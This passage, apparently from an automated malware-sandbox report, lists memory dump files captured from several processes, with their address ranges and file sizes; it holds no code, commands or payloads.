              • memory/1948-102-0x00007FFA82810000-0x00007FFA82835000-memory.dmp

                Filesize

                148KB

              • memory/1948-325-0x00007FFA732A0000-0x00007FFA732CE000-memory.dmp

                Filesize

                184KB

              • memory/1948-326-0x00007FFA85D80000-0x00007FFA85D8F000-memory.dmp

                Filesize

                60KB

              • memory/1948-103-0x00007FFA82630000-0x00007FFA8263F000-memory.dmp

                Filesize

                60KB

              • memory/1948-145-0x00007FFA6C530000-0x00007FFA6CA59000-memory.dmp

                Filesize

                5.2MB

              • memory/1948-259-0x00007FFA7C680000-0x00007FFA7C6B3000-memory.dmp

                Filesize

                204KB

              • memory/1948-260-0x00007FFA6C530000-0x00007FFA6CA59000-memory.dmp

                Filesize

                5.2MB

              • memory/1948-261-0x0000029E601E0000-0x0000029E60709000-memory.dmp

                Filesize

                5.2MB

              • memory/1948-263-0x00007FFA7C0D0000-0x00007FFA7C19D000-memory.dmp

                Filesize

                820KB

              • memory/1948-264-0x00007FFA85D80000-0x00007FFA85D8F000-memory.dmp

                Filesize

                60KB

              • memory/1948-298-0x00007FFA7BAC0000-0x00007FFA7BACE000-memory.dmp

                Filesize

                56KB

              • memory/1948-297-0x00007FFA7BAD0000-0x00007FFA7BADC000-memory.dmp

                Filesize

                48KB

              • memory/1948-268-0x00007FFA6CFD0000-0x00007FFA6D6A9000-memory.dmp

                Filesize

                6.8MB

              • memory/1948-316-0x00007FFA7C810000-0x00007FFA7C822000-memory.dmp

                Filesize

                72KB

              • memory/1948-315-0x00007FFA7CA20000-0x00007FFA7CA36000-memory.dmp

                Filesize

                88KB

              • memory/1948-322-0x00007FFA791C0000-0x00007FFA791CC000-memory.dmp

                Filesize

                48KB

              • memory/1948-321-0x00007FFA7B1E0000-0x00007FFA7B1F2000-memory.dmp

                Filesize

                72KB

              • memory/1948-320-0x00007FFA7B200000-0x00007FFA7B20D000-memory.dmp

                Filesize

                52KB

              • memory/1948-319-0x00007FFA7B210000-0x00007FFA7B21C000-memory.dmp

                Filesize

                48KB

              • memory/1948-318-0x00007FFA7B430000-0x00007FFA7B43C000-memory.dmp

                Filesize

                48KB

              • memory/1948-317-0x00007FFA7BA90000-0x00007FFA7BA9B000-memory.dmp

                Filesize

                44KB

              • memory/1948-314-0x00007FFA7CA10000-0x00007FFA7CA1B000-memory.dmp

                Filesize

                44KB

              • memory/1948-313-0x00007FFA7D360000-0x00007FFA7D36B000-memory.dmp

                Filesize

                44KB

              • memory/1948-312-0x00007FFA7C0D0000-0x00007FFA7C19D000-memory.dmp

                Filesize

                820KB

              • memory/1948-311-0x00007FFA7C680000-0x00007FFA7C6B3000-memory.dmp

                Filesize

                204KB

              • memory/1948-310-0x00007FFA80350000-0x00007FFA8035D000-memory.dmp

                Filesize

                52KB

              • memory/1948-309-0x00007FFA803B0000-0x00007FFA803BD000-memory.dmp

                Filesize

                52KB

              • memory/1948-308-0x00007FFA7E510000-0x00007FFA7E529000-memory.dmp

                Filesize

                100KB

              • memory/1948-307-0x00007FFA7C940000-0x00007FFA7C975000-memory.dmp

                Filesize

                212KB

              • memory/1948-306-0x00007FFA82620000-0x00007FFA8262D000-memory.dmp

                Filesize

                52KB

              • memory/1948-305-0x00007FFA80230000-0x00007FFA8025D000-memory.dmp

                Filesize

                180KB

              • memory/1948-304-0x00007FFA803C0000-0x00007FFA803D9000-memory.dmp

                Filesize

                100KB

              • memory/1948-303-0x00007FFA82630000-0x00007FFA8263F000-memory.dmp

                Filesize

                60KB

              • memory/1948-302-0x00007FFA82810000-0x00007FFA82835000-memory.dmp

                Filesize

                148KB

              • memory/1948-301-0x00007FFA7BFB0000-0x00007FFA7BFD7000-memory.dmp

                Filesize

                156KB

              • memory/1948-300-0x00007FFA7BAA0000-0x00007FFA7BAAB000-memory.dmp

                Filesize

                44KB

              • memory/1948-299-0x00007FFA7BAB0000-0x00007FFA7BABC000-memory.dmp

                Filesize

                48KB

              • memory/1948-296-0x00007FFA7BAE0000-0x00007FFA7BAEC000-memory.dmp

                Filesize

                48KB

              • memory/1948-295-0x00007FFA7BAF0000-0x00007FFA7BAFB000-memory.dmp

                Filesize

                44KB

              • memory/1948-294-0x00007FFA7BF90000-0x00007FFA7BF9C000-memory.dmp

                Filesize

                48KB

              • memory/1948-293-0x00007FFA7BFA0000-0x00007FFA7BFAB000-memory.dmp

                Filesize

                44KB

              • memory/1948-292-0x00007FFA7C070000-0x00007FFA7C07C000-memory.dmp

                Filesize

                48KB

              • memory/1948-291-0x00007FFA7C670000-0x00007FFA7C67B000-memory.dmp

                Filesize

                44KB

              • memory/1948-289-0x00007FFA6BF60000-0x00007FFA6C07B000-memory.dmp

                Filesize

                1.1MB

              • memory/1948-286-0x00007FFA7C250000-0x00007FFA7C264000-memory.dmp

                Filesize

                80KB

              • memory/1948-285-0x00007FFA7C270000-0x00007FFA7C288000-memory.dmp

                Filesize

                96KB

              • memory/1948-284-0x00007FFA6C080000-0x00007FFA6C1F6000-memory.dmp

                Filesize

                1.5MB

              • memory/1948-283-0x00007FFA7C290000-0x00007FFA7C2B4000-memory.dmp

                Filesize

                144KB

              • memory/1948-280-0x00007FFA6C530000-0x00007FFA6CA59000-memory.dmp

                Filesize

                5.2MB

              • memory/1948-324-0x00007FFA732D0000-0x00007FFA732F9000-memory.dmp

                Filesize

                164KB

              • memory/1948-323-0x00007FFA6BCD0000-0x00007FFA6BF53000-memory.dmp

                Filesize

                2.5MB

              • memory/2120-219-0x0000028918800000-0x0000028918822000-memory.dmp

                Filesize

                136KB

              • memory/2932-251-0x000001A2E2DC0000-0x000001A2E2FDC000-memory.dmp

                Filesize

                2.1MB